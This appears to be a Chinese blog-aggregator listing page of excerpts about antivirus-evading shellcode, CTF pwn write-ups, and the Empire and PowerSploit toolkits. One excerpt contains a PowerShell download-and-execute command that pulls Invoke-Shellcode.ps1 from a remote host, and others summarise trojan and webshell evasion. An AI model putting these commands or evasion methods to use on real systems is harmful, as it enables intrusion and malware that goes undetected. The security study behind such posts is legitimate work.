免杀Shellcode 第21页

jarvisoj——[XMAN]level3

题目Wp查一下常规，开了NX，NX开了之后就不能执行自己的shellcode了。

Bubble_zhu·2020-08-04 17:35

jarvisoj pwn level1 ——记第一次shellcode的编写

jarvisoj（https://www.jarvisoj.com/challenges）pwn部分level1解题过程：在队友的指导下写了人生第一个shellcode感觉很刺激，过程中还是学到了很多东西

Vccxx·2020-08-04 16:47

【pwn】SWPUCTF_2019_p1KkHeap

于是就只能自己将shellcode（orw）写到0

yudhui·2020-08-04 14:17

浅析本机API[zt]

bysunwear[E.S.T]2004/10/02shellcode[email protected]此文只能说是一篇笔记，是关于本机API的.本机API是除了Win32API，NT平台开放了另一个基本接口。

excuseser·2020-08-04 14:57

第十六章免杀

.防病毒软件▪恶意程序最主要的防护手段–杀毒软件/防病毒软件–客户端/服务端/邮件防病毒▪检测原理–基于二进制文件中特征签名的黑名单检测方法–基于行为的分析方法（启发式）▪事后手段–永远落后于病毒发展免杀技术

baihuang8062·2020-08-04 13:27

Jarvis OJ-PWN-[XMAN]level3 wp

ncpwn2.jarvisoj.com9879一开始拿到题目的时候是一个rar文件解压后就得到了两个文件对这两个文件查看保护两个文件都是32位的level3没有开启栈保护可以利用栈溢出；栈中内容不可使用不用shellcodelibc

Retrovich·2020-08-04 12:15

【pwn】 [极客大挑战 2019]Not Bad

程序在最开始mmap了一块内存，可写可执行，那么接下来目标就是1.在这块内存上写shellcode2.跳转过来执行由于不能rop且栈是可执行的想到能不能进行jmprsp。在程序中找到了这个指令。

yudhui·2020-08-04 10:30

20.03.25(还有sniperoj-pwn100-shellcode-x86-64的wp)

Pwn的做题记录:来自两届BJD都被暴打的彩笔总结(第一届还没学导致pwn爆零,第二届才学两天导致只做出一道pwnQAQ)sniperoj-pwn100-shellcode的wp:因为开启了PIE所以,

北岛静石·2020-08-04 10:25

MBR勒索之手动修复引导

MBR勒索是把一段shellcode写入到磁盘引导里面，使得开机时不能正常引导进入系统，平常遇见的MBR勒索病毒都是易语言大手子写的模块，供其他人使用，只要是勒索就肯定会有恢复的方式，所以今天就写一篇手动修复

0x17·2020-08-03 08:54

nps内网渗透利用

0x00前言对比了比较多的代理工具，如ew流量不稳定，容易断；frsocks目前免杀，也是容易断。frp需要落地配置文件，不符合渗透的规则。reg正向的socks，速度比较慢，扫描是个问题。

weixin_30883311·2020-08-02 19:14

2020SCTF PWN部分wp

这里写目录CoolCodesnake总结CoolCode这个题主要是shellcode非常的难构造。比赛的时候whali3n51大师傅做出来的，我只是复现了他的payload。

starssgo·2020-08-02 18:12

# 2018-2019-2 20165210《网络攻防技术》Exp1 PC平台逆向破解（BOF实验）

利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数注入一个自己制作的shellcode并运行这段shellcode。

aomangsheng3817·2020-08-02 17:42

【免杀篇】远控免杀专题(31)-powershell加载shellcode免杀-4种方式(VT免杀率5-58)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01powershell加载shellcode介绍0x02powershell的几个基础知识powershell版本问题常见执行方式执行策略0x03powershell

Agan '·2020-08-02 15:07

Powershell Empire 绕过AV实现远控

虽然这款框架集成了从漏洞发现到漏洞利用的几乎所有功能，但是不得不承认其在木马后门的免杀方面现如今已经不足以应付一些流氓杀软了。但是，PowershellEmpire可以。

weixin_34037977·2020-08-02 14:33

Red Team之Empire Powershell多种方法渗透Windows

usestagerwindows/backdoorLnkMacrodlllauncher_batlauncher_vbsmacroless_mswordbunnyduckylauncher_lnklauncher_xmlshellcodecsharp_exehtalauncher_sctmacroteensy

a阿飞·2020-08-02 13:34

empire用法笔记

其中集成了很多内网的一些工具以及命令，使用方便，且empire生成的木马文件基于powershell，所以在windows平台上有很好的免杀效果。结合msf使用更是如虎添翼。

aFa攻防实验室·2020-08-02 13:45

【逆向】PDF CVE-2008-2992 ShellCode提取

本文主要内容为记录从PDF文件中提取漏洞利用shellcode过程。分析工具：1、可以使用010Editor的PDF模板进行分析。2、也可以使用PDFStreamDumper进行分析。

bailing1370·2020-08-01 11:31

[源码和文档分享]基于VC++的WIN32 API界面编程实现的百战天虫小游戏

HERO阵营的目标为阻止精灵继续逍遥法外，但是为了保护珍稀精灵，HERO需要尽量避免杀死精灵，并且收服精灵。WIZARD阵营的目标为杀死HERO阵

ggdd5151·2020-08-01 07:26

堆栈里的秘密行动：劫持执行流

神秘的0xCC“去吧，为了首领的伟大理想出发”我是一段二进制代码shellcode，0xCC大人精心创造了我，一同诞生的还有一个HTML表单文件小P，我就栖身在小P的身上，随着一个POST请求，我们朝着目标奔去

编程技术宇宙·2020-07-31 06:19

【基础篇】————10、隐匿攻击之Website Keyword

在DerbyCon3.0期间，MattGraeber和ChrisCampbell介绍了一种使用网站关键字的技术，以便在系统中触发shellcode的发布。

FLy_鹏程万里·2020-07-30 23:16

【基础篇】————20、隐匿攻击之Images

echo'IEX((new-objectnet.webclient).downloadstring("http://192.168.1.171/tmp/Invoke-Shellcode.ps1"));Invoke-Shellcode-payloadwindows

FLy_鹏程万里·2020-07-30 22:37

shellcode之二.Plus2：ret2libc实例

在最后提到ret2libc，原书并没有详细的资源。但理解这个对以后如何绕开不可执行栈（nx-stack）有很大的帮助，鉴于此，我在网络上找到一些相关资料，并进行相应的试验。Thebasicideabehindthe"ReturntoLibc"attackisthateventhoughthestackhasbeenmarked"NonExecutable",itcanstillbeoverwrit

sepnic·2020-07-30 16:07

Ret2ShellCode

红颜祸千般柔情相思难解两相若蝶恋花几经浮沉枯骨终是化飞沙简介ret2shellcode顾名思义，就是returntoshellcode，即让程序中某个函数执行结束后，返回到shellcode的地址去执行

钞sir·2020-07-30 16:07

PWN ret2shellcode

今天天气阴，来做一下ret2shellcode。记录一下。

prettyX·2020-07-30 16:25

使用ret2libc攻击方法绕过数据执行保护

前面介绍的攻击方法大量使用Shellcode，核心思想是修改EIP和注入Shellcode，在函数返回时跳到Shellcode去执行。

海枫·2020-07-30 15:59

如何编写本地shellcode

好，我们正式开始一步步来编写shellcode，结合之前的示例程序，写个打开一个新shell的shellcode。在写之前，先介绍编写shellcode的一些技巧，特别有用。

海枫·2020-07-30 15:28

通过xencrypt免杀invoke-mimikatz.ps1

0x01简介xencrypt目前测试只在windows2012powershell下可正常使用，需要依赖原本的invoke-mimikatz.ps1，生成以后可多次使用。0x02使用1、下载invoke-mimikatz.ps1到同级目录下。https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltratio

`GGyao·2020-07-30 15:15

Shellcode中ret调用和call调用函数区别

ShellShellcode中ret调用和call调用函数区别在编写shellcode时，我们通常会使用call或者ret来调用执行某些系统函数或者我们自己编写的函数代码。

js0huang·2020-07-30 15:25

中级ROP之ret2reg

将寄存器所指向的空间上注入shellcode（确保该空间是可以执行的，通常是栈上的）利用思路分析和调试汇编，查看溢出函数返回时哪个寄存器指向缓冲区地址向寄存器指向的缓冲区中注入shellcode查找call

西杭·2020-07-30 13:24

与ret2shellcode的初相识

害~0x00ret2shellcode简介ret2shellcode，也就是returntoshellcode，在执行完某个函数之后，跳到shellcode上，达到getshell的目的。

gclome·2020-07-30 13:13

走过路过，不要错过的powersploit用法简介！

文章目录01简介02PowerSploit的安装03PowersSploit脚本攻击实战1Invoke-Shellcode2Invoke-Dlllnjection3Invoke-Portscan4Invoke-Mimikatz5Get-Keystrokes04

gclome·2020-07-30 13:08

如何在目标内网中发现更多存活主机

win下进行各种arp扫描:1#start/barpscan.exe-t192.168.3.0/24>>result.txt利用powershell脚本进行arp扫描,这也是个人比较推荐的方式,轻量且免杀效果较

weixin_30305735·2020-07-30 12:46

柳宗元的高级隐喻故事：《种树郭囊驼传》顺从人的天性，自然发展

左传战国策，很多士大夫再劝谏国君的时候都是大量的都是大量的引用寓言故事，以避免杀身之祸，取得了非常好的劝谏的效果。

正念教练张林宝·2020-07-30 11:20

路由器漏洞挖掘之栈溢出 - 反弹shell的payload构造

前言前一篇讲到了ROP链的构造，最后直接使用调用execve函数的shellcode就可以直接getshell，但是实际路由器溢出的情况下都不会那么简单。

abc380620175·2020-07-30 07:38

2019 安恒周周练西湖论剑特别版 pwn 题目wp

pwn1考点：构造shellcode，patch汇编指令IDA查看反汇编，程序的逻辑很简单如，如果直接f5的话IDA可能识别不出来函数，问题出在0x080484CF这个地方，calleax指令识别不出来

abc380620175·2020-07-30 07:07

病毒知识与常见杀毒软件了解

病毒常用的免杀技术加壳加花变种升级杀毒引擎杀毒引擎的任务：对指定的文件或程序进行判断是否合法。脱壳分为硬脱壳和动态脱壳虚拟机脱壳引擎技

weixin_30929195·2020-07-30 02:24

CrypMic分析报告

通过函数返回地址+函数第一个参数来确定跳转到的地址，这里主要用于免杀和增加逆向分析难度。释放恶意代码。多次跳转后到达PE解密的地方，首先从第一个区段中获取到用于PE替换的数据

weixin_30527143·2020-07-30 02:39

BUU刷题（三）

remote("node3.buuoj.cn","27782")payload=p32(0x0804a02c)+'%11$n'p.sendline(payload)p.interactive()others_shellcode

playmak3r·2020-07-29 23:29

pwn-ROP

checksec，提示NXenabled，看看其解释NX/DEP（堆栈不可执行）NX即No-eXecute（不可执行）的意思，NX（DEP）的基本原理是将数据所在内存页标识为不可执行，当程序溢出成功转入shellcode

aitangdao4981·2020-07-29 17:28

CTF|逆向工程软件之IDA

是目前最棒的一个静态反编译软件，为众多0day世界的成员和ShellCode安全分析人士不可

一个不融化的雪人·2020-07-29 11:20

kali的payload的使用攻击之反弹型payload的使用

一、msfvenom命令简介msfvenom是payload产生器，也是shellcode代码生成器Payload，中文“有效载荷”，指成功exploit之后，真正在目标系统执行的代码或指令。

红尘卖酒人·2020-07-29 11:02

CTF-Tools 一款CTF古典密码加解密工具

支持的编码解码:URL-UTF-8URL-GB2312UnicodeEscape(%U)HtmlEncodeACSIIBase16Base32Base64Str->HexShellcode支持的加密解密

浅笑⁹⁹⁶·2020-07-29 11:11

TideSec远控免杀学习四（BackDoor-Factory+Avet+TheFatRat）

参考资料利用BDF向EXE文件植入后门:https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91EXE%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/backdoor-factory使用简介：https://www.lstazl.com/

fa1lr4in·2020-07-29 09:12

教你制作一个木马免杀的360

制作一个360免杀的木马我们用到工具：kail：利用msfvenom（美少妇）MSFvenom的常用命令1、我们进入到msf里面在msf后生成一个exe的木马文件，这-p就是生成window模块playload

EdisonJH·2020-07-29 09:39

PHP一句话木马免杀

作者：小刚一位苦于信息安全的萌新小白帽，记得关注给个赞，谢谢本实验仅用于信息防御教学，切勿用于其它用途PHP木马免杀小技巧免杀小技巧1.字符串拼接方式，构造敏感函数。

小刚127.0.0.1·2020-07-29 08:52

Format-String Vulnerability Lab 格式化字符串漏洞（shellcode写进环境变量）

//vul.c/**如果获得环境变量的程序和攻击的程序的文件名长度不一样，环境变量的地址*会发生偏移。因此，要么令两个程序的文件名长度相等（推荐），要么考虑偏*移来计算环境变量地址。*gcc-zexecstack-ogotgot.c*/#include#includeintmain(intargc,char**argv){charbuf[1024];strncpy(buf,argv[1],size

A菱a·2020-07-29 07:04

绝对牛逼哄哄的shellcode内存注入，支持64，32，远程内存注入，支持VMP壳最大强度保护

论坛上内存注入的帖子不止三两个，来来去去也就那样，无非抄来抄去说原创。我也是抄的，不敢说原创，但是牛逼还是说的过去。支持注入任意进程,包括csrss，前提是你能有读写进程内存的权限。看到MemLoadLibrary2注释的人，如果觉得有点熟悉，那你一定老了。哈哈哈，因为这个MemLoadLibrary2的原型，没记错的话，应该是2009年以前的一个memoryloaddll。具体是谁写的我也不懂了

看雪学院·2020-07-29 05:12

从webshell开始的内网入侵

对内网入侵的一个小总结，大多是参考一叶知安的文章：一次完整的从webshell到域控的探索之路正文开始：大体思路：免杀payload的生成，请使用Veilmsf在meterpreter下的提权尝试msf

逝之君·2020-07-29 02:57

有趣的Shellcode和栈

学弟问了一个ctf-wiki上pwn入门题的知识点，本身没什么意思，但引发的一些小思考感觉还挺好玩的……当然也有可能我作为一个单纯的re狗，pwn题总是被队友秒光了所以没什么写shellcode或者ROP

奈沙夜影·2020-07-28 23:00

windows编程_远程注入安全

远程注入1.向目标进程中申请内存2.向目标内存中写入shellcode（没有特征码，但编码麻烦）3.创建远程线程执行shellcode–>dll：获取dll的路径，然后加载dlldll的加载1.静态调用

北风~·2020-07-28 23:15

推荐频道

免杀Shellcode